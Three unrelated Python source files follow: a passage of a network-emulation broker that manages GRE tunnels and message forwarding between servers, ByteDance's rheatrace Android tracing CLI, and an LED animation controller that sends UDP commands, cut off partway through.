logging.debug("adding network tunnels for nodes: %s", self.network_nodes)
for n in self.network_nodes:
self.addnettunnel(n)
def addnettunnel(self, node_id):
"""
Add network tunnel between node and broker.
:param int node_id: node id of network to add tunnel to
:return: list of gre taps
:rtype: list
"""
try:
net = self.session.get_node(node_id)
logging.info("adding net tunnel for: id(%s) %s", node_id, net)
except KeyError:
raise KeyError("network node %s not found" % node_id)
# add other nets here that do not require tunnels
if nodeutils.is_node(net, NodeTypes.EMANE_NET):
logging.warning("emane network does not require a tunnel")
return None
server_interface = getattr(net, "serverintf", None)
if nodeutils.is_node(net, NodeTypes.CONTROL_NET) and server_interface is not None:
logging.warning("control networks with server interfaces do not need a tunnel")
return None
servers = self.getserversbynode(node_id)
if len(servers) < 2:
logging.warning("not enough servers to create a tunnel: %s", servers)
return None
hosts = []
for server in servers:
if server.host is None:
continue
logging.info("adding server host for net tunnel: %s", server.host)
hosts.append(server.host)
if len(hosts) == 0:
for session_client in self.session_clients:
# get IP address from API message sender (master)
if session_client.client_address != "":
address = session_client.client_address[0]
logging.info("adding session_client host: %s", address)
hosts.append(address)
r = []
for host in hosts:
if self.myip:
# we are the remote emulation server
myip = self.myip
else:
# we are the session master
myip = host
key = self.tunnelkey(node_id, IpAddress.to_int(myip))
if key in self.tunnels.keys():
logging.info("tunnel already exists, returning existing tunnel: %s", key)
gt = self.tunnels[key]
r.append(gt)
continue
logging.info("adding tunnel for net %s to %s with key %s", node_id, host, key)
gt = GreTap(node=None, name=None, session=self.session, remoteip=host, key=key)
self.tunnels[key] = gt
r.append(gt)
# attaching to net will later allow gt to be destroyed
# during net.shutdown()
net.attach(gt)
return r
def deltunnel(self, n1num, n2num):
"""
Delete tunnel between nodes.
:param int n1num: node one id
:param int n2num: node two id
:return: nothing
"""
key = self.tunnelkey(n1num, n2num)
try:
logging.info("deleting tunnel between %s - %s with key: %s", n1num, n2num, key)
gt = self.tunnels.pop(key)
except KeyError:
gt = None
if gt:
self.session.delete_node(gt.id)
del gt
def gettunnel(self, n1num, n2num):
"""
Return the GreTap between two nodes if it exists.
:param int n1num: node one id
:param int n2num: node two id
:return: gre tap between nodes or none
"""
key = self.tunnelkey(n1num, n2num)
logging.debug("checking for tunnel(%s) in: %s", key, self.tunnels.keys())
if key in self.tunnels.keys():
return self.tunnels[key]
else:
return None
def addnodemap(self, server, nodenum):
"""
Record a node number to emulation server mapping.
:param CoreDistributedServer server: core server to associate node with
:param int nodenum: node id
:return: nothing
"""
with self.nodemap_lock:
if nodenum in self.nodemap:
if server in self.nodemap[nodenum]:
return
self.nodemap[nodenum].add(server)
else:
self.nodemap[nodenum] = {server}
if server in self.nodecounts:
self.nodecounts[server] += 1
else:
self.nodecounts[server] = 1
def delnodemap(self, server, nodenum):
"""
Remove a node number to emulation server mapping.
Return the number of nodes left on this server.
:param CoreDistributedServer server: server to remove from node map
:param int nodenum: node id
:return: number of nodes left on server
:rtype: int
"""
count = None
with self.nodemap_lock:
if nodenum not in self.nodemap:
return count
self.nodemap[nodenum].remove(server)
if server in self.nodecounts:
count = self.nodecounts[server]
count -= 1
self.nodecounts[server] = count
return count
def getserversbynode(self, nodenum):
"""
Retrieve a set of emulation servers given a node number.
:param int nodenum: node id
:return: core server associated with node
:rtype: set
"""
with self.nodemap_lock:
if nodenum not in self.nodemap:
return set()
return self.nodemap[nodenum]
def addnet(self, nodenum):
"""
Add a node number to the list of link-layer nodes.
:param int nodenum: node id to add
:return: nothing
"""
logging.info("adding net to broker: %s", nodenum)
self.network_nodes.add(nodenum)
logging.info("broker network nodes: %s", self.network_nodes)
def addphys(self, nodenum):
"""
Add a node number to the list of physical nodes.
:param int nodenum: node id to add
:return: nothing
"""
self.physical_nodes.add(nodenum)
def handle_message(self, message):
"""
Handle an API message. Determine whether this needs to be handled
by the local server or forwarded on to another one.
Returns True when message does not need to be handled locally,
and performs forwarding if required.
Returning False indicates this message should be handled locally.
:param core.api.coreapi.CoreMessage message: message to handle
:return: true or false for handling locally
:rtype: bool
"""
servers = set()
handle_locally = False
# Do not forward messages when in definition state
# (for e.g. configuring services)
if self.session.state == EventTypes.DEFINITION_STATE.value:
return False
# Decide whether message should be handled locally or forwarded, or both
if message.message_type == MessageTypes.NODE.value:
handle_locally, servers = self.handlenodemsg(message)
elif message.message_type == MessageTypes.EVENT.value:
# broadcast events everywhere
servers = self.getservers()
elif message.message_type == MessageTypes.CONFIG.value:
# broadcast location and services configuration everywhere
confobj = message.get_tlv(ConfigTlvs.OBJECT.value)
if confobj == "location" or confobj == "services" or confobj == "session" or confobj == "all":
servers = self.getservers()
elif message.message_type == MessageTypes.FILE.value:
# broadcast hook scripts and custom service files everywhere
filetype = message.get_tlv(FileTlvs.TYPE.value)
if filetype is not None and (filetype[:5] == "hook:" or filetype[:8] == "service:"):
servers = self.getservers()
if message.message_type == MessageTypes.LINK.value:
# prepare a server list from two node numbers in link message
handle_locally, servers, message = self.handlelinkmsg(message)
elif len(servers) == 0:
# check for servers based on node numbers in all messages but link
nn = message.node_numbers()
if len(nn) == 0:
return False
servers = self.getserversbynode(nn[0])
# allow other handlers to process this message (this is used
# by e.g. EMANE to use the link add message to keep counts of
# interfaces on other servers)
for handler in self.handlers:
handler(message)
# perform any message forwarding
handle_locally |= self.forwardmsg(message, servers)
return not handle_locally
def setupserver(self, servername):
"""
Send the appropriate API messages for configuring the specified emulation server.
:param str servername: name of server to configure
:return: nothing
"""
server = self.getserverbyname(servername)
if server is None:
logging.warning("ignoring unknown server: %s", servername)
return
if server.sock is None or server.host is None or server.port is None:
logging.info("ignoring disconnected server: %s", servername)
return
        # communicate this session's current state to the server
tlvdata = coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, self.session.state)
msg = coreapi.CoreEventMessage.pack(0, tlvdata)
server.sock.send(msg)
# send a Configuration message for the broker object and inform the
# server of its local name
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "broker")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, ConfigFlags.UPDATE.value)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.DATA_TYPES.value, (ConfigDataTypes.STRING.value,))
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value,
"%s:%s:%s" % (server.name, server.host, server.port))
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.SESSION.value, "%s" % self.session.id)
msg = coreapi.CoreConfMessage.pack(0, tlvdata)
server.sock.send(msg)
@staticmethod
def fixupremotetty(msghdr, msgdata, host):
"""
When an interactive TTY request comes from the GUI, snoop the reply
and add an SSH command to the appropriate remote server.
:param msghdr: message header
:param msgdata: message data
:param str host: host address
:return: packed core execute tlv data
"""
msgtype, msgflags, _msglen = coreapi.CoreMessage.unpack_header(msghdr)
msgcls = coreapi.CLASS_MAP[msgtype]
msg = msgcls(msgflags, msghdr, msgdata)
nodenum = msg.get_tlv(ExecuteTlvs.NODE.value)
execnum = msg.get_tlv(ExecuteTlvs.NUMBER.value)
cmd = msg.get_tlv(ExecuteTlvs.COMMAND.value)
res = msg.get_tlv(ExecuteTlvs.RESULT.value)
tlvdata = b""
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, nodenum)
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, execnum)
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, cmd)
res = "ssh -X -f " + host + " xterm -e " + res
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.RESULT.value, res)
return coreapi.CoreExecMessage.pack(msgflags, tlvdata)
def handlenodemsg(self, message):
"""
Determine and return the servers to which this node message should
be forwarded. Also keep track of link-layer nodes and the mapping of
nodes to servers.
:param core.api.coreapi.CoreMessage message: message to handle
:return: boolean for handling locally and set of servers
:rtype: tuple
"""
servers = set()
handle_locally = False
serverfiletxt = None
# snoop Node Message for emulation server TLV and record mapping
n = message.tlv_data[NodeTlvs.NUMBER.value]
# replicate link-layer nodes on all servers
nodetype = message.get_tlv(NodeTlvs.TYPE.value)
if nodetype is not None:
try:
nodecls = nodeutils.get_node_class(NodeTypes(nodetype))
except KeyError:
logging.warning("broker invalid node type %s", nodetype)
return handle_locally, servers
if nodecls is None:
logging.warning("broker unimplemented node type %s", nodetype)
return handle_locally, servers
if issubclass(nodecls, CoreNetworkBase) and nodetype != NodeTypes.WIRELESS_LAN.value:
# network node replicated on all servers; could be optimized
# don"t replicate WLANs, because ebtables rules won"t work
servers = self.getservers()
handle_locally = True
self.addnet(n)
for server in servers:
self.addnodemap(server, n)
# do not record server name for networks since network
                # nodes are replicated across all servers
return handle_locally, servers
elif issubclass(nodecls, CoreNodeBase):
name = message.get_tlv(NodeTlvs.NAME.value)
if name:
serverfiletxt = "%s %s %s" % (n, name, nodecls)
if issubclass(nodecls, PhysicalNode):
# remember physical nodes
self.addphys(n)
# emulation server TLV specifies server
servername = message.get_tlv(NodeTlvs.EMULATION_SERVER.value)
server = self.getserverbyname(servername)
if server is not None:
self.addnodemap(server, n)
if server not in servers:
servers.add(server)
if serverfiletxt and self.session.master:
self.writenodeserver(serverfiletxt, server)
# hook to update coordinates of physical nodes
if n in self.physical_nodes:
self.session.mobility.physnodeupdateposition(message)
return handle_locally, servers
def handlelinkmsg(self, message):
"""
Determine and return the servers to which this link message should
be forwarded. Also build tunnels between different servers or add
opaque data to the link message before forwarding.
:param core.api.coreapi.CoreMessage message: message to handle
:return: boolean to handle locally, a set of server, and message
:rtype: tuple
"""
servers = set()
handle_locally = False
# determine link message destination using non-network nodes
nn = message.node_numbers()
logging.debug("checking link nodes (%s) with network nodes (%s)", nn, self.network_nodes)
if nn[0] in self.network_nodes:
if nn[1] in self.network_nodes:
# two network nodes linked together - prevent loops caused by
# the automatic tunnelling
handle_locally = True
else:
servers = self.getserversbynode(nn[1])
elif nn[1] in self.network_nodes:
servers = self.getserversbynode(nn[0])
else:
logging.debug("link nodes are not network nodes")
servers1 = self.getserversbynode(nn[0])
logging.debug("servers for node(%s): %s", nn[0], servers1)
servers2 = self.getserversbynode(nn[1])
logging.debug("servers for node(%s): %s", nn[1], servers2)
# nodes are on two different servers, build tunnels as needed
if servers1 != servers2:
localn = None
if len(servers1) == 0 or len(servers2) == 0:
handle_locally = True
servers = servers1.union(servers2)
host = None
# get the IP of remote server and decide which node number
# is for a local node
for server in servers:
host = server.host
if host is None:
# server is local
handle_locally = True
if server in servers1:
localn = nn[0]
else:
localn = nn[1]
if handle_locally and localn is None:
# having no local node at this point indicates local node is
# the one with the empty server set
if len(servers1) == 0:
localn = nn[0]
elif len(servers2) == 0:
localn = nn[1]
if host is None:
host = self.getlinkendpoint(message, localn == nn[0])
logging.debug("handle locally(%s) and local node(%s)", handle_locally, localn)
if localn is None:
message = self.addlinkendpoints(message, servers1, servers2)
elif message.flags & MessageFlags.ADD.value:
self.addtunnel(host, nn[0], nn[1], localn)
elif message.flags & MessageFlags.DELETE.value:
self.deltunnel(nn[0], nn[1])
handle_locally = False
else:
servers = servers1.union(servers2)
return handle_locally, servers, message
def addlinkendpoints(self, message, servers1, servers2):
"""
For a link message that is not handled locally, inform the remote
servers of the IP addresses used as tunnel endpoints by adding
opaque data to the link message.
:param core.api.coreapi.CoreMessage message: message to link end points
:param servers1:
:param servers2:
:return: core link message
:rtype: coreapi.CoreLinkMessage
"""
ip1 = ""
for server in servers1:
if server.host is not None:
ip1 = server.host
break
ip2 = ""
for server in servers2:
if server.host is not None:
ip2 = server.host
break
tlvdata = message.raw_message[coreapi.CoreMessage.header_len:]
tlvdata += coreapi.CoreLinkTlv.pack(LinkTlvs.OPAQUE.value, "%s:%s" % (ip1, ip2))
newraw = coreapi.CoreLinkMessage.pack(message.flags, tlvdata)
msghdr = newraw[:coreapi.CoreMessage.header_len]
return coreapi.CoreLinkMessage(message.flags, msghdr, tlvdata)
def getlinkendpoint(self, msg, first_is_local):
"""
A link message between two different servers has been received,
and we need to determine the tunnel endpoint. First look for
opaque data in the link message, otherwise use the IP of the message
sender (the master server).
:param core.api.tlv.coreapi.CoreLinkMessage msg: link message
:param bool first_is_local: is first local
:return: host address
:rtype: str
"""
host = None
opaque = msg.get_tlv(LinkTlvs.OPAQUE.value)
if opaque is not None:
if first_is_local:
host = opaque.split(":")[1]
else:
host = opaque.split(":")[0]
if host == "":
host = None
if host is None:
for session_client in self.session_clients:
# get IP address from API message sender (master)
if session_client.client_address != "":
host = session_client.client_address[0]
break
return host
def handlerawmsg(self, msg):
"""
Helper to invoke message handler, using raw (packed) message bytes.
        :param msg: raw message bytes
:return: should handle locally or not
:rtype: bool
"""
hdr = msg[:coreapi.CoreMessage.header_len]
msgtype, flags, _msglen = coreapi.CoreMessage.unpack_header(hdr)
msgcls = coreapi.CLASS_MAP[msgtype]
return self.handle_message(msgcls(flags, hdr, msg[coreapi.CoreMessage.header_len:]))
def forwardmsg(self, message, servers):
"""
Forward API message to all given servers.
Return True if an empty host/port is encountered, indicating
the message should be handled locally.
:param core.api.coreapi.CoreMessage message: message to forward
:param list servers: server to forward message to
:return: handle locally value
:rtype: bool
"""
handle_locally = len(servers) == 0
for server in servers:
if server.host is None and server.port is None:
# local emulation server, handle this locally
handle_locally = True
elif server.sock is None:
logging.info("server %s @ %s:%s is disconnected", server.name, server.host, server.port)
else:
logging.info("forwarding message to server(%s): %s:%s", server.name, server.host, server.port)
logging.debug("message being forwarded:\n%s", message)
server.sock.send(message.raw_message)
return handle_locally
def writeservers(self):
"""
Write the server list to a text file in the session directory upon
startup: /tmp/pycore.nnnnn/servers
:return: nothing
"""
servers = self.getservers()
filename = os.path.join(self.session.session_dir, "servers")
master = self.session_id_master
if master is None:
master = self.session.id
try:
with open(filename, "w") as f:
f.write("master=%s\n" % master)
for server in servers:
if server.name == "localhost":
continue
lhost, lport = None, None
if server.sock:
lhost, lport = server.sock.getsockname()
f.write("%s %s %s %s %s\n" % (server.name, server.host, server.port, lhost, lport))
except IOError:
logging.exception("error writing server list to the file: %s", filename)
def writenodeserver(self, nodestr, server):
"""
Creates a /tmp/pycore.nnnnn/nX.conf/server file having the node
and server info. This may be used by scripts for accessing nodes on
other machines, much like local nodes may be accessed via the
VnodeClient class.
:param str nodestr: node string
:param CoreDistributedServer server: core server
:return: nothing
"""
serverstr = "%s %s %s" % (server.name, server.host, server.port)
name = nodestr.split()[1]
dirname = os.path.join(self.session.session_dir, name + ".conf")
filename = os.path.join(dirname, "server")
try:
os.makedirs(dirname)
except OSError:
# directory may already exist from previous distributed run
logging.exception("error creating directory: %s", dirname)
try:
with open(filename, "w") as f:
f.write("%s\n%s\n" % (serverstr, nodestr))
except IOError:
logging.exception("error writing server file %s for node %s", filename, name)
def local_instantiation_complete(self):
"""
        Set the local server's instantiation-complete status to True.
:return: nothing
"""
# TODO: do we really want to allow a localhost to not exist?
with self.servers_lock:
server = self.servers.get("localhost")
if server is not None:
server.instantiation_complete = True
# broadcast out instantiate complete
tlvdata = b""
tlvdata += coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, EventTypes.INSTANTIATION_COMPLETE.value)
message = coreapi.CoreEventMessage.pack(0, tlvdata)
for session_client in self.session_clients:
session_client.sendall(message)
def instantiation_complete(self):
"""
Return True if all servers have completed instantiation, False
otherwise.
        :return: have all servers completed instantiation
:rtype: bool
"""
with self.servers_lock:
for name in self.servers:
server = self.servers[name]
if not server.instantiation_complete:
return False
return True
|
rheatrace.py
|
#!/usr/bin/env python
# Copyright (C) 2021 ByteDance Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Usage: rhea.py [options] [category1 [category2 ...]]
Example: rheatrace.py -b 32768 -t 15 -o trace.html -a
Options:
-h, --help show this help message and exit
-a APP_NAME, --app=APP_NAME
enable application-level tracing for comma-separated
list of app cmdlines
-e DEVICE_SERIAL_NUMBER, --serial=DEVICE_SERIAL_NUMBER
adb device serial number
-b N, --buf-size=N use a trace buffer size of N KB
-t N, --time=N trace for N seconds
-o FILE write trace output to FILE
-k KFUNCS, --ktrace=KFUNCS
specify a comma-separated list of kernel functions to
trace
  --from-file FILE     read the trace from a file (compressed) rather than
                       running a live trace
--categories=SYSTRACE_CATEGORIES
Select categories with a comma-delimited list, e.g.
cat1,cat2,cat3
-l, --list-categories
list the available categories and exit
RheaTrace options:
  -v, --version        show rhea script version and exit.
  -r, --restart        if app is running, it will be killed and restarted.
"""
import os
import sys
import logging
import shutil
import time
import multiprocessing
import optparse
import rhea_config
from common.context import Context
from common import env_checker
from enhanced_systrace import systrace_capturer
from rhea_atrace import atrace_capturer
from common import cmd_executer
from rhea_atrace.rhea_log.rhea_logger import rhea_logger, set_logger
from trace_processor import TraceProcessor
logger = rhea_logger
def add_sys_options(parser):
parser.add_option('-a', '--app', dest='app_name', default=None, type='string', action='store',
help='enable application-level tracing for comma-separated list of app cmdlines')
parser.add_option('-e', '--serial', dest='device_serial_number', type='string', help='adb device serial number')
parser.add_option('-b', '--buf-size', dest='trace_buf_size',
type='int', default='32768', help='use a trace buffer size of N KB', metavar='N')
parser.add_option('-t', '--time', dest='trace_time', type='int',
help='trace for N seconds', metavar='N')
parser.add_option('-o', dest='output_file', help='write trace output to FILE',
default=None, metavar='FILE')
parser.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
parser.add_option('--from-file', dest='from_file', action='store',
help='read the trace from a file (compressed) rather than'
'running a live trace')
parser.add_option('--categories', dest='systrace_categories',
help='Select categories with a comma-delimited '
'list, e.g. cat1,cat2,cat3')
parser.add_option('-l', '--list-categories', dest='list_categories',
default=False, action='store_true',
help='list the available categories and exit')
return parser
def add_extra_options(parser):
options = optparse.OptionGroup(parser, 'RheaTrace options')
options.add_option('-v', '--version', dest='version', action="store_true", default=False,
help="rhea script version and exit")
parser.add_option('--advanced-sys-time', dest='advanced_systrace_time', type='int',
default='2', help='advanced systrace time for N seconds', metavar='N')
parser.add_option('-r', '--restart', dest='restart',
default=False, action='store_true',
help='if app is running, it will be killed and restart.')
parser.add_option('--debug', dest='debug',
default=False, action='store_true',
help='Set the log switch to debug level.')
return options
def parse_options(argv):
"""Parses and checks the command-line options."""
usage = 'Usage: %prog [options] [category1 [category2 ...]]'
desc = 'Example: %prog -b 32768 -t 15 gfx input view sched freq'
parser = optparse.OptionParser(usage=usage, description=desc,
conflict_handler="resolve")
parser = add_sys_options(parser)
option_group = add_extra_options(parser)
if option_group:
parser.add_option_group(option_group)
(options, categories) = parser.parse_args(argv[1:])
"""arg check"""
if options.output_file is None:
options.output_file = rhea_config.DEFAULT_OUTPUT_FILE
context = Context.instance()
context.set_options(options, categories, multiprocessing.Manager().dict())
return context
def _initialize_devices(context):
from devil.android.sdk import adb_wrapper
from systrace import run_systrace
run_systrace.initialize_devil()
devices = [device.GetDeviceSerial() for device in adb_wrapper.AdbWrapper.Devices()]
if context.serial_number is None:
if len(devices) == 0:
logger.error('no adb devices connected.')
return False
elif len(devices) == 1:
context.serial_number = devices[0]
return True
elif len(devices) >= 2:
logger.error('multiple devices connected, serial number required')
return False
elif context.serial_number not in devices:
logger.error('Device with the serial number "%s" is not connected.'
% context.serial_number)
return False
return True
def remove_all_stale_pyc_files(base_dir):
"""Scan directories for old .pyc files without a .py file and delete them."""
for dirname, _, filenames in os.walk(base_dir):
if '.git' in dirname:
continue
for filename in filenames:
root, ext = os.path.splitext(filename)
if ext != '.pyc':
continue
pyc_path = os.path.join(dirname, filename)
py_path = os.path.join(dirname, root + '.py')
try:
if not os.path.exists(py_path):
os.remove(pyc_path)
except OSError:
# Wrap OS calls in try/except in case another process touched this file.
pass
try:
os.removedirs(dirname)
except OSError:
# Wrap OS calls in try/except in case another process touched this dir.
pass
def init_build_dir(context):
if os.path.exists(context.build_dir) and os.path.isdir(context.build_dir):
shutil.rmtree(context.build_dir)
os.makedirs(context.build_dir)
def show_version():
"""
show current rheatrace script version
"""
print "Current version is %s.\n" % rhea_config.VERSION_CODE
sys.exit(0)
def main_impl(argv):
"""check environment variables, if not satisfied, will exit"""
is_python_2_7 = env_checker.check_python()
if is_python_2_7 is False:
sys.exit(1)
remove_all_stale_pyc_files(os.path.dirname(__file__))
"""parse input options."""
context = parse_options(argv)
"""clean and mkdirs"""
init_build_dir(context)
set_logger(None, context.build_dir)
if context.debug:
set_logger(logging.DEBUG, context.build_dir)
if context.show_version:
show_version()
sys.exit(1)
elif context.list_categories:
(out, return_code) = systrace_capturer.show_list_categories(context.serial_number)
logger.info("\n" + out)
sys.exit(1)
elif context.trace_time < 0:
logger.error('trace time must be specified or a non-negative number')
sys.exit(1)
elif context.trace_buf_size < 0:
logger.error('trace buffer size must be a positive number')
sys.exit(1)
elif context.advanced_systrace_time < 0:
logger.error('advanced systrace time must be a positive number')
sys.exit(1)
elif context.from_file:
(out, return_code) = systrace_capturer.from_file(context.from_file)
logger.info("\n" + out)
sys.exit(1)
else:
if context.app_name is None or "":
logger.error("app name must be specified, using '-a' to set app name.")
sys.exit(1)
env_ok = env_checker.check_env()
if not env_ok:
sys.exit(1)
if not _initialize_devices(context):
sys.exit(1)
"""delete rheatrace.stop file"""
if __delete_rheatrace_stop_file(context) is False:
logger.debug("failed to delete rhea-atrace.stop file, maybe it's not exist.")
"""check whether app is installed or not."""
result = __check_install(context.app_name, context.serial_number)
if not result:
logger.warning("app '%s' is not installed, please check your inputs.", context.app_name)
sys.exit(1)
"""start to capture systrace"""
        _systrace_capturer = multiprocessing.Process(target=systrace_capturer.capture, args=(context,))
_systrace_capturer.start()
time.sleep(context.advanced_systrace_time)
"""launch app and capture atrace"""
        _atrace_capturer = multiprocessing.Process(target=atrace_capturer.capture, args=(context,))
_atrace_capturer.start()
_systrace_capturer.join()
_atrace_capturer.join()
logger.debug("waiting for writing rhea-atrace.gz file.")
time_loop = 0
while time_loop < 20:
if __is_rheatrace_stop_file_exist(context):
logger.debug("finish to write rhea-atrace.gz file.")
break
else:
time_loop = time_loop + 2
time.sleep(2)
if not __is_rheatrace_stop_file_exist(context):
logger.error("failed to write rhea-atrace.gz file completely.")
trace_processor = TraceProcessor(context)
trace_processor.processor()
def __check_install(app_name, serial_number):
if app_name is None:
return False
cmd = ["shell", "pm", "path", app_name]
(output, return_code) = cmd_executer.exec_commands(cmd_executer.get_complete_abd_cmd(cmd, serial_number))
if len(output) > 0:
return True
else:
return False
def __is_rheatrace_stop_file_exist(context):
commands = [
"ls " + rhea_config.ATRACE_APP_GZ_FILE_LOCATION.replace("%s", context.app_name) + "rheatrace.stop",
"exit"
]
(out, return_code) = cmd_executer.exec_adb_shell_with_append_commands(commands, context.serial_number)
    if return_code == 0:
return True
else:
return False
def __delete_rheatrace_stop_file(context):
commands = [
"cd " + rhea_config.ATRACE_APP_GZ_FILE_LOCATION.replace("%s", context.app_name),
"rm rheatrace.stop",
"exit"
]
(out, return_code) = cmd_executer.exec_adb_shell_with_append_commands(commands, context.serial_number)
    if return_code == 0:
return True
else:
return False
if __name__ == "__main__":
main_impl(sys.argv)
|
animation.py
|
'''
Steps for adding a new pattern:
1. Create new animation function using the template
2. Add the new animation function to the setPattern switch statement
3. Increase the shufflePattern() function's randint by 1
'''
'''
Animation Function Template:
def Function():
global animation
animation = Function
#send udp string
MESSAGE = "Function"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
'''
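# Example of a pattern added by following the template above. The "sparkle"
# name and UDP command are purely illustrative; the UDP receiver would need a
# matching effect for it to do anything:
#
# def sparkle():
#     global animation
#     animation = sparkle
#     #send udp string
#     MESSAGE = "sparkle"
#     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))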
#import led
import config
import visualization
import microphone
#import other
import colorsys
import time
import threading
import socket
import random
################################ GLOBAL VARIABLES #########################################
lastShuffle = 0
shuffleDuration = 10.0
shufflingV = False
wasShufflingV = False
shuffler = threading.Timer(1.0, print)
shuffler.daemon = True
UDP_IP = config.UDP_IP
UDP_PORT = config.UDP_PORT
currentVis = ""
currentColor = {"r": 255, "g":255, "b":255}
isRunning = False
################################ POWER CONTROLS #########################################
def on():
print("animation on")
animation()
def off():
print("animation off")
global animation
global wasShufflingV
if animation == visualize:
if shufflingV:
wasShufflingV = True
stop()
elif animation == startShufflePattern:
stopShuffle()
MESSAGE = "off"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ SLIDER CONTROLS #########################################
def setBrightness(brightness):
print("animation brightnes")
print(brightness)
MESSAGE = 'brightness {}'.format(brightness)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def setSpeed(speed):
print("animation Speed")
print(speed)
speedMap = {1:15, 2:30, 3:60, 4:120, 5:240, 6:480}
MESSAGE = 'speed {}'.format(speedMap[speed])
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ PATTERN ANIMATIONS #########################################
def setPattern(pattern):
patternString = ""
if animation == visualize:
stop()
if pattern == 0:
patternString = "Shuffle"
startShufflePattern()
elif pattern == 1:
patternString = "Flash"
flash()
elif pattern == 2:
patternString = "Fade"
fade()
elif pattern == 3:
patternString = "Rainbow"
rainbow()
elif pattern == 4:
patternString = "Rainbow With Glitter"
rainbowWithGlitter()
elif pattern == 5:
patternString = "Cylon"
cylon()
elif pattern == 6:
patternString = "Sinelon"
sinelon()
elif pattern == 7:
patternString = "Confetti"
confetti()
elif pattern == 8:
patternString = "BPM"
bpm()
elif pattern == 9:
patternString = "Juggle"
juggle()
else:
patternString = "Error Not a Pattern"
print(patternString)
return patternString
def shufflePattern():
global lastShuffle
global shuffler
global animation
if animation != startShufflePattern:
stopShuffle()
return
newShuffle = random.randint(1,9)
while(lastShuffle == newShuffle):
newShuffle = random.randint(1,9)
lastShuffle = newShuffle
setPattern(newShuffle)
animation = startShufflePattern
shuffler = threading.Timer(shuffleDuration, shufflePattern)
shuffler.daemon = True
shuffler.start()
def startShufflePattern():
stopShuffle()
global animation
animation = startShufflePattern
shufflePattern()
def stopShuffle():
global shuffler
global shufflingV
shuffler.cancel()
shufflingV = False
def flash():
global animation
animation = flash
#send udp string
MESSAGE = "flash"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def fade():
global animation
animation = fade
#send udp string
MESSAGE = "fade"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def rainbow():
global animation
animation = rainbow
#send udp string
MESSAGE = "rainbow"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def rainbowWithGlitter():
global animation
animation = rainbowWithGlitter
#send udp string
MESSAGE = "rainbowWithGlitter"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def cylon():
global animation
animation = cylon
#send udp string
MESSAGE = "cylon"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def sinelon():
global animation
animation = sinelon
#send udp string
MESSAGE = "sinelon"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def confetti():
global animation
animation = confetti
#send udp string
MESSAGE = "confetti"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def bpm():
global animation
animation = bpm
#send udp string
MESSAGE = "bpm"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def juggle():
global animation
animation = juggle
#send udp string
MESSAGE = "juggle"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
################################ VISUALIZATION ANIMATIONS #########################################
def setVisualization(visualization):
global currentVis
global wasShufflingV
visualizationString = ""
if visualization == 0:
visualizationString = "Shuffle"
startShuffleVisualization()
elif visualization == 1:
visualizationString = "Energy"
currentVis = "energy"
stopShuffle()
wasShufflingV = False
visualize()
elif visualization == 2:
visualizationString = "Spectrum"
currentVis = "spectrum"
stopShuffle()
wasShufflingV = False
visualize()
elif visualization == 3:
visualizationString = "Scroll"
currentVis = "scroll"
stopShuffle()
wasShufflingV = False
visualize()
else:
stopShuffle()
visualizationString = "Error Not a Visualization"
print(visualizationString)
return visualizationString
def stop():
print("Stopping")
microphone.running = False
stopShuffle()
time.sleep(.01)
def shuffleVisualization():
global lastShuffle
global shuffler
global currentVis
if not shufflingV:
stopShuffle()
return
newShuffle = random.randint(1,3)
while(lastShuffle == newShuffle):
newShuffle = random.randint(1,3)
